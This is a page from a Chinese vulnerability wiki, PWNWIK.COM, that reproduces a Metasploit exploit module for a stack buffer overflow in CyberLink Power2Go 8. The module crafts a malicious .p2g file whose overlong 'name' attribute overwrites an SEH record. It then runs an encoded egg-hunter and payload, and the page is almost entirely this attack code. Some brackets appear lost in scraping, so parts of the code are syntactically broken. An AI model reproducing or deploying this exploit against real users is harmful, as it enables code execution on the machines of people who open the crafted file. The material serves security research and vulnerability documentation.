Loading
0

CyberLink Power2Go name attribute (p2g)堆栈缓冲区溢出漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

EXP

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
  super(update_info(info,
   'Name'            => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit',
   'Description'     => %q{
     This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
    The vulnerability is triggered when opening a malformed p2g file containing an overly
    long string in the 'name' attribute of the file element. This results in overwriting a
    structured exception handler record.
   },
   'License'         => MSF_LICENSE,
   'Author'          =>
    
     'modpr0be <modpr0beatspentera.com>',    # initial discovery
     'mr_me <steventhomasseeleyatgmail.com>' # msf module
    ,
   'References'      =>
    
     'BID', '50997',
     'OSVDB', '70600',
     'URL', 'http://www.exploit-db.com/exploits/18220/',
     'URL', 'http://www.kb.cert.org/vuls/id/158003'
    ,
   'DefaultOptions'  =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'         =>
    {
     'Space'    => 1024,
     'BadChars' => "\x00"
    },
   'Platform'        => 'win',
   'Targets'         =>
    
     # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
      'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } 
    ,
   'DisclosureDate'  => 'Sep 12 2011',
   'DefaultTarget'   => 0))

  register_options(
   
    OptString.new('FILENAME',  true, 'The output filename.', 'msf.p2g')
   , self.class)
 end

 def get_payload(hunter)
  
   'x86/alpha_mixed', 'x86/unicode_mixed' .each { |name|
   enc = framework.encoders.create(name)
   if name =~ /unicode/
    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
   else
    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
   end
   # NOTE: we already eliminated badchars
   hunter = enc.encode(hunter, nil, nil, platform)
   if name =~/alpha/
    #insert getpc_stub & align EDX, unicode encoder friendly.
    #Hardcoded stub is not an issue here because it gets encoded anyway
    getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
    hunter = getpc_stub + hunter
   end
  }

  return hunter
 end

 def exploit

  title = rand_text_alpha(10)
  buffer =  ""
  buffer << rand_text_alpha(778)
  buffer << "\x58\x28"        # nseh
  buffer << target'Ret'     # seh
  buffer << "\x5f\x73" * 15   # pop edi/add ebx,dh (after byte alignment)
  buffer << "\x58\x73"        # pop eax/add ebx,dh (after byte alignment)
  buffer << "\x40\x73" * 3    # inc eax/add ebx,dh (after byte alignment)
  buffer << "\x40"            # inc eax
  buffer << "\x73\x42" * 337  # add ebx,dh/pop edx (after byte alignment)
  buffer << "\x73"            # add ebx,dh (after byte alignment)
  buffer << get_payload(payload.encoded)

  p2g_data = <<-EOS
  <Project magic="#{title}" version="101">
  <Information />
   <Compilation>
    <DataDisc>
     <File name="#{buffer}" />
    </DataDisc>
   </Compilation>
  </Project>
  EOS

  print_status("Creating '#{datastore'FILENAME'}' file ...")
  file_create(p2g_data)
 end
end

PWNWIK.COM==免费、自由、人人可编辑的漏洞库